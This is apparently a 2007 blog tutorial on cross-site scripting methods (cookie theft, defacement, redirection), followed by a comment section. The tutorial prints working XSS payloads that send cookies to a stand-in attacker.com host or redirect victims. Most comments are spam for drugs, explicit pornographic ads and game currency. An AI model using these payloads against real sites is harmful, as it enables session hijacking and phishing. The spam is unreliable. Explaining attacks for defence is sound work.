User Agent Injection are those attacks where malicious, client-side executable code is being injected, which means malformed request parameters are passed to the web application.The input will then be processed by the server and stored on the web server to return it to a victim at a later time or to the attacker to take immediate effect. When the victim requests the stored code from the server, it will be executed on the client-side. JavaScript is by far the most frequently used scripting language for user agent injection,but almost always in conjunction with HTML.
Cookie theft
The user receives a cookie, a 32-byte number in Rails, after the login process to identify him insubsequent requests. Consequently, stealing cookies is a severe problem for web applications,and it is by far the most frequent goal of Cross-Site Scripting (XSS) attacks. In JavaScript you can use the document.cookie variable to read and write the document's cookie. JavaScript enforces the same origin policy, that means a script from one origin cannot access properties of a document of another origin. However, you can access it if you embed the code directly in the HTML document. The following is an example of an injection that displays your cookie in the output of your web application:
<script>document.write(document.cookie);</script>
As this will present the cookie to the victim, it is not useful for an attacker, so he will use a method which will list the cookies in an attacker's web server access log. The following loads a non-existantimage from an URL like http://www.attacker.com/ plus the cookie:
<script>document.write('<img xsrc="http://www.attacker.com/' +
document.cookie + '">');</script>
Or without the <script> tag; loads it when the victim's mouse moves over the text:
<b onMouseOver="self.location.href='http://www.attacker.com/' +
document.cookie">bolded text</b>
Or the reflected variant in an URL; redirects the victim:
http://www.domain.com/account?name=<script>document.
location.replace('http://www.attacker.com/'+
document.cookie);</script>
Defacement
With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials or other sensitive data. He does that by injecting malicious HTML/JavaScript code into a parameter which will presented to the user(s), such as a comment feature or a message board. If there is no filter at all, it will be straightforward for the attacker to study the internals of the HTML source code to construct a page which contains links and forms that point to a different web site.
This is an example of a refelcted defacement in an URL. It will display a different web site (from x4u.at.hm in this case) as part of the original one if the username parameter is not filtered and will be redisplayed. The URL deliberately does not contain http to bypass possible filters.
http://www.website.com/login?username=<iframe xsrc=//x4u.at.hm/>
Redirection
Another way to get sensitive data from the user is toredirect the victim on a fraudulent web site which looks and behaves exactly as the original one. If the victim enters data, the fraudulent web site will log it and send it to the original web site. The following two examples can be used to redirect the victim when the containing site is loaded:
<!-- redirect to the given URL which sends the cookie to an attacker-->
<script>document.location.replace('http://www.attacker.com/'+
document.cookie);</script>
<!-- redirect after 0 seconds to the given URL
bypasses filters for <script> -->
<meta http-equiv="refresh" content="0; URL=http://www.attacker.com/">
to be continued...
Wednesday, May 2, 2007 at 12:34AM 
View Printer Friendly Version
Email Article to Friend
Reader Comments (227)
umqoke tnushvw xreluqbim wruptf jdsau jezybamh upvihjna
Cross-Site Scripting (User Agent Injection) Attack Methods...
[url=http://846-hotel-in-empoli.cercfi.info/]hotel in empoli[/url] [url=http://1675-il-castello-errante-di-howl.cerctwe.org/]il castello errante di howl[/url]
"However, you can access it if you embed the code directly in the HTML document"
Confusingly written, how about : "However, since same-origin allows you to read and embed the cookie directly in to the HTML document...."
and then follow straight to the server log HTML instead of the redundant 'alert' script.
lvbyjsp jbiyseqf vhqdz vcsg sbthrnvxp qxbezhuk oqixpwa
Very interesting site!
order [url=http://www.luludroppy.com/kezzymarget.html]kezzymarget[/url] order
online [url=http://www.luludroppy.com/pollykandros.html]pollykandros[/url] online
Tramadol is not approved by the FDA for use by children younger than 16 years of age. ... These drugs may increase drowsiness caused by Tramadol. Disclaimer ... SKIP INTRO. http://1984-tramadol.100webspace.net/map.html Onlinepharmacymd.com has immediate delivery of FDA approved online pharmacy medicines, such as Tramadol, Soma, Fioricet and Levitra plus many more, ...
Girls give Blowjobs through gloryholes. Cocksucking at a hole in the wall.Girls sucking big black dicks on perfect strangers.Cock sucking at its best! ... Milf pictures and mpegs of hot milf moms, awesome milf fuck porn galleries with sexy pics and milf thumbnails starring horny and sexy ladies.
http://61.freepicblowjob.net/map.html International Dating Service. Featuring personals from USA, Canada, Russia, Australia, UK, Sweden, Norway, Finland and beyond.
biophysicist peeks radioactive represents Freemason radicals car ins cheap [url=http://www.autotot.com/car-ins-cheap.html]car ins cheap[/url] http://www.autotot.com/car-ins-cheap.html ...
buy tramadol tablets · best online soma buy tramadol now · cheap tramadols c o d · tramadol abuse snort · extreme weakness nausea tramadol ... http://mappr11.0catch.com/index2.html - pill p445 This website has information on tramadol hcl 50 mg tab, drug iegnformashun keyworred traadol and drug more tramadol use of cheap online order tramadol ... http://maappssttrraammaadol.0catch.com/index2.html
HOW TO USE: Take Tramadol by mouth as prescribed. It is typically taken every 4 to 6 hours as needed. Use this medication exactly as prescribed. ... http://maappssttrraammaadol.0catch.com/index2.html - carisoprodol link maxpages.com online tramadol tramadol2 Buy tramadol online cod. Buy tramadol online the best. Review Major depression is still being lean and athletic, then repeated and abandoned again, ...
:Posted: Sun Sep 16, 2007 3:47 pm Post subject: BUY TRAMADOL. Cheap tramadol. Best deal, Reply with quote. Nice forum! Click links below to earn BIG MONEY! ...
:buy tramadol tablets · best online soma buy tramadol now · cheap tramadols c o d · tramadol abuse snort · extreme weakness nausea tramadol ...
http://medical-all.150m.com/6.html l544
http://medical-all-4.0catch.com/58.html link online prescription.html purchase rublik.otbet.ru tramadol tramadol
good worck Gloryhole is all about dirty little whores sucking anonymous cock. That's right. These cock craving amateurs suck big cocks without even knowing what the ...
senks
At Luna Lullaby, avail good services for infant by using baby lullabies, baby blanket wholesale, baby care natural product, baby gift organic. ,does the jewish groom give his bride gifts ,gift promotion code Image: Emmanuel's Gift: Robin Williams,Oprah Winfrey,Nancy Stern,Lisa Lax (II) by Robin Williams,Oprah Winfrey,Nancy Stern,Lisa Lax (II) Child's Gift Of Lullabyes music CD album $9.65 in stock at CD Universe, Blister Pack, enjoy top rated service and worldwide shipping. ,good boyfriend gifts ,gift gold groomsmens white Build a Baby Basket, LLC is a truly unique gift giving experience. We specialize in customizable baby baskets - where the customer designs their own basket. Find fun and unique gift baskets for babies. FindGift.com is the home of unique gift ideas. ,weird valentine day gifts http://new-year2008.freehostia.com/55.html birthday gift in law sister
,wedding anniversary gift for each year The Peanut Baby Gift Basket! This Baby Basket is excellent for: A baby shower gift. A newborn baby gift. A first birthday gift. The Peanut Basket will more ... EMMANUEL'S GIFT follows the inspirational story of a disabled orphan abandoned by his father, dismissed by his village and a country who thought him better ... ,wedding gift bags http://new-2008-year.100webspace.net/55.html gift baskets notre dame theme ,gifts for guests at a wedding Then Emmanuel will verify your gift to your employer. You will be notified by Emmanuel when your gift is matched. Why not take advantage of this easy ...
SNORTING TRAMADOL - from tramadol buy dreampharm, tramadol fedex, buy cheap tramadol, discount tramadol buy, delivery tramadol 180 cash, tramadol 50mg hcl ... , Buy Cheapest best tramadol prices. Online Pharmacy best tramadol prices. ... cod online tramadol cheap tramadol online cheap tramadol online t7 tramadol ...
http://medical-all-1.0catch.com/links/index.html 0 by leave often online popl powered tramadol wordpress Take tramadol as prescribed by your physician or pharmacist. Tramadol is taken by mouth. In general tramadol is taken every 4-6 hours as needed. ...
, buy eve isk, Cheap eve isk. We provide cheap eve isk to reliable customer.
, eve online isk, buy eve online isk, Cheap eve online isk.
Buy ,cheap ffxi gil,cheapest ffxi gil,ffxi gil sale.We supply cheap ,eq2 platinum and eq2 plat gold, eq2 plat,so you buy cheap eq2 plat gold, eq2 plat accounts. is the most valuable form of currency in Lineage 2(L2 Adena). We provide cheap eve online isk to reliable customer.Cheap for sale,lowest price gold for wow,as low as $19/1000 Gold..Buy world of warcraft gold here.
|
|
|
|
|
lltpeb lltpeb lltpeb lltpeb lltpeb